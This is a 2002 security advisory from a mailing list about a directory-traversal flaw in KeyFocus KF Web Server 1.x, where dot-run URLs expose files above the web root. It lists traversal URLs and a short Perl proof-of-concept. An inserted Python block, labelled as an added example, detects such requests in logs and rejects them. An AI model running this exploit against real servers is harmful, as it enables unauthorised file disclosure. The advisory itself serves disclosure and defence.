[NT] KeyFocus KF Web Server File Disclosure Vulnerability

From: support@securiteam.com
Date: 11/14/02


From: support@securiteam.com
To: list@securiteam.com
Date: 14 Nov 2002 15:01:26 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  KeyFocus KF Web Server File Disclosure Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.keyfocus.net/kfws/> KeyFocus Web server is a Win32 HTTP
server with web administration, a variety of logging formats, such as NCSA
and W3C, CGI, compression, memory caching of static documents, directory
indexing, pre-defined MIME settings, internal authentication with support
for multiple realms, and a variety of URL checks that make it more secure
against hacking attempts such as buffer overruns.

DETAILS

Vulnerable systems:
 * KFWS version 1.x

Immune systems:
 * KFWS version 2.0.0

KFWS contains a flaw that enables attackers to traverse above the webroot
in the directory structure. This is not a traditional directory traversal
attack. KFWS does not properly handle consecutive dot characters in the
file name:

http://kfws/. - Current Directory
http://kfws/.. - 403 Forbidden
http://kfws/... - KFWS install dir (OOPS!)
http://kfws/.... - Program Files
http://kfws/..... - \

This vulnerability is limited by the internal hack defenses of the server
-- only files with recognized MIME types can be retrieved. This
significantly limits the damage from this vulnerability.
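As an added example, not part of the advisory or of KFWS itself, the following Python shows the two things a defender would want from this report: a scan over NCSA-style access log lines (the advisory notes KFWS can log in NCSA format) that flags request paths containing a segment made only of three or more dots, and a path-resolution routine that rejects dot-only segments before mapping a URL to a file under the web root. The log lines, client address, web root and function names are constructed for the example; posixpath is used so the resolver behaves the same on any platform, which makes it illustrative rather than a Win32 implementation.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed NCSA common-log lines (not from the advisory): one benign request,
# one classic "..", and two runs of three or more dots of the kind the advisory
# describes. The long run is built with "." * 15 so its length is unambiguous.
LONG_RUN = "." * 15
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [14/Nov/2002:15:01:26 +0200] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.5 - - [14/Nov/2002:15:01:27 +0200] "GET /../boot.ini HTTP/1.0" 403 0',
    '10.0.0.5 - - [14/Nov/2002:15:01:28 +0200] "GET /.../kfws.ini HTTP/1.0" 200 230',
    '10.0.0.5 - - [14/Nov/2002:15:01:29 +0200] "GET /%s/boot.ini HTTP/1.0" 200 310' % LONG_RUN,
])

# NCSA common log: client ident user [timestamp] "METHOD path proto" status size
NCSA_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)'
)


def dot_run_segments(path):
    """Return every path segment that consists of three or more dots.

    The URL is percent-decoded first so an encoded run (%2e%2e%2e) is caught
    as well. "." and ".." are ordinary and are not reported here.
    """
    decoded = unquote(path)
    return [seg for seg in decoded.split("/") if len(seg) >= 3 and set(seg) == {"."}]


def scan_ncsa_log(text):
    """Return (client, path, status, longest_run) for each suspicious request.

    A 200 status on a flagged path is the interesting case: it means the server
    served something from above the web root rather than refusing the request.
    """
    hits = []
    for line in text.splitlines():
        m = NCSA_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, status, _size = m.groups()
        segs = dot_run_segments(path)
        if segs:
            hits.append((client, path, int(status), max(len(s) for s in segs)))
    return hits


class UnsafePath(ValueError):
    """Raised when a request path must not be mapped to the filesystem."""


def resolve_under_webroot(webroot, request_path):
    """Map a URL path to a file path that cannot escape webroot.

    Any segment made only of dots (other than a lone ".") is rejected before
    normalisation, so a server using this routine never has to decide what
    "..." means. The normalised result is then checked to still lie under
    webroot, which also covers "..", so the two checks back each other up.
    """
    decoded = unquote(request_path)
    for seg in decoded.split("/"):
        if seg and set(seg) == {"."} and seg != ".":
            raise UnsafePath("dot-only segment %r" % seg)
        if "\\" in seg or ":" in seg:  # Win32 separators and drive letters
            raise UnsafePath("unsupported characters in %r" % seg)
    joined = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    if joined != webroot and not joined.startswith(webroot.rstrip("/") + "/"):
        raise UnsafePath("escapes webroot: %s" % joined)
    return joined


if __name__ == "__main__":
    for client, path, status, run in scan_ncsa_log(SAMPLE_LOG):
        print("%s %s status=%d dot-run=%d" % (client, path, status, run))
    print(resolve_under_webroot("/srv/www", "/./index.html"))
```

Running the block prints the two flagged log lines (the "..." request and the fifteen-dot request, both with status 200) and the resolved path for a benign request; the "/../boot.ini" line is not flagged by the scanner because the advisory's point is that ".." was already refused with 403, and the resolver rejects it separately.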

Solution:
KFWS v2.0.0 (Beta) eliminates this vulnerability, and the next stable
version will eliminate the flaw as well. Administrators who are concerned
about this flaw should upgrade to the beta.

Exploit:
#!/usr/bin/perl
# Proof of concept for KFWS 1.x: a run of dots in a path segment walks up one
# directory per extra dot, so the request below reaches far above the webroot.
use strict;
use warnings;
use URI::Escape;
use IO::Socket;

if (@ARGV < 3) {
    # three arguments are needed, not two as the original check assumed
    print STDOUT "Usage: perl $0 [filename] [host] [port]\n";
} else {
    my $f = IO::Socket::INET->new(PeerAddr => $ARGV[1], PeerPort => $ARGV[2], Proto => "tcp")
        or die "connect to $ARGV[1]:$ARGV[2] failed: $!\n";
    my $url = uri_escape($ARGV[0]);
    # the original sprintf had a %s placeholder but no argument for it
    my $exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n", $url);
    print $f $exploit;
    close $f;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:mattmurphy@kc.rr.com> Matt
Murphy.
